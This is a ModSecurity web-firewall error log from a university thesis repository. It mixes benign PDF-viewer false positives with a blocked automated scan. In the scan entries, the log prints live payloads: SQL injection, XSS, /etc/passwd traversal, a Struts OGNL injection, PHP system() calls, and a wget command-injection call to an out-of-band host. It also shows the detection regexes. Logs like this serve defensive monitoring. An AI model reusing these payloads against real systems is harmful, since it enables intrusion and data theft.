[Tue Aug 29 09:26:38.534219 2023] [:error] [pid 63493] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//COVER-DAFTAR LAMPIRAN_Fadiila Hasyanah_41152020190024.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO1XXsCo-f0AAPgFskUAAAAA"]
[Tue Aug 29 09:28:47.339987 2023] [:error] [pid 63550] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB IV_Fadilla Hasyanah_41152020190024.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO1X38Co-f0AAPg@cwMAAAAN"]
[Tue Aug 29 09:29:37.002566 2023] [:error] [pid 63493] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover-1_(2)_Syah_Dwianti_Putri.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO1YEcCo-f0AAPgFsmcAAAAA"]
[Tue Aug 29 09:29:42.027438 2023] [:error] [pid 63594] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB II Syah Dwianti Putri.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO1YFsCo-f0AAPhqF7cAAAAT"]
[Tue Aug 29 09:31:10.578331 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//turnitin-manajerial strategis.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO1YbsCo-f0AAPgD0dQAAAAO"]
[Tue Aug 29 10:44:36.331118 2023] [:error] [pid 64873] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//turnitin-manajerial strategis.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO1ppMCo-f0AAP1pb0sAAAAZ"]
[Tue Aug 29 11:01:44.297002 2023] [:error] [pid 65321] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Reisma_Kusdamayanti-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO1tqMCo-f0AAP8pBvIAAAAY"]
[Tue Aug 29 11:01:52.056791 2023] [:error] [pid 65257] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//Bab II Reisma Kusdamayanti.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO1tsMCo-f0AAP7pbtsAAAAd"]
[Tue Aug 29 11:01:56.646129 2023] [:error] [pid 65257] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//Bab I Reisma Kusdamayanti.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO1ttMCo-f0AAP7pbt0AAAAd"]
[Tue Aug 29 11:02:04.640244 2023] [:error] [pid 65342] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//Bab IV Reisma Kusdamayanti.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO1tvMCo-f0AAP8@WGQAAAAE"]
[Tue Aug 29 11:02:11.175197 2023] [:error] [pid 65422] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//Bab III Reisma Kusdamayanti.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO1tw8Co-f0AAP@OWmcAAAAO"]
[Tue Aug 29 11:02:19.170220 2023] [:error] [pid 65257] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//Bab V Reisma Kusdamayanti.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO1ty8Co-f0AAP7pbt8AAAAd"]
[Tue Aug 29 11:02:43.775662 2023] [:error] [pid 65257] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//Daftar Pustaka Reisma Kusdamayanti.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO1t48Co-f0AAP7pbuIAAAAd"]
[Tue Aug 29 11:19:30.756960 2023] [:error] [pid 674] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO1x0sCo-f0AAAKifkIAAAAM"]
[Tue Aug 29 11:19:30.986729 2023] [:error] [pid 720] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO1x0sCo-f0AAALQE0AAAAAN"]
[Tue Aug 29 11:30:11.240441 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10U8Co-f0AAAOH4QsAAAAH"]
[Tue Aug 29 11:30:11.479802 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/actions/seomatic/meta-container/meta-link-container/"] [unique_id "ZO10U8Co-f0AAAOKNlMAAAAK"]
[Tue Aug 29 11:30:12.616824 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/actions/seomatic/meta-container/all-meta-containers"] [unique_id "ZO10VMCo-f0AAAPNBPIAAAAZ"]
[Tue Aug 29 11:30:12.727899 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAN5YFMAAAAN"]
[Tue Aug 29 11:30:13.350857 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAAN5YFcAAAAN"]
[Tue Aug 29 11:30:14.333164 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VsCo-f0AAAOOuSMAAAAW"]
[Tue Aug 29 11:30:15.385200 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAAN5YGMAAAAN"]
[Tue Aug 29 11:30:15.388233 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAPRNX0AAAAf"]
[Tue Aug 29 11:30:16.325462 2023] [:error] [pid 965] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlgkgyk3c55tsy9n.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlgkgyk3c55tsy9n.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlgkgyk3c55tsy9n.oast.site\\x5c\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAPFPgIAAAAR"]
[Tue Aug 29 11:30:17.455998 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAO873IAAAAF"]
[Tue Aug 29 11:30:19.645283 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAAPRNY8AAAAf"]
[Tue Aug 29 11:30:20.548409 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAAOGae4AAAAS"]
[Tue Aug 29 11:30:22.356343 2023] [:error] [pid 991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XsCo-f0AAAPfm64AAAAR"]
[Tue Aug 29 11:30:22.564433 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgienuwj6xxwskb.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10XsCo-f0AAAPahu4AAAAL"]
[Tue Aug 29 11:30:23.318806 2023] [:error] [pid 991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10X8Co-f0AAAPfm7AAAAAR"]
[Tue Aug 29 11:30:23.338601 2023] [:error] [pid 991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAAPfm7EAAAAR"]
[Tue Aug 29 11:30:24.323769 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAAOOuTsAAAAW"]
[Tue Aug 29 11:30:24.328210 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAAPQkfIAAAAe"]
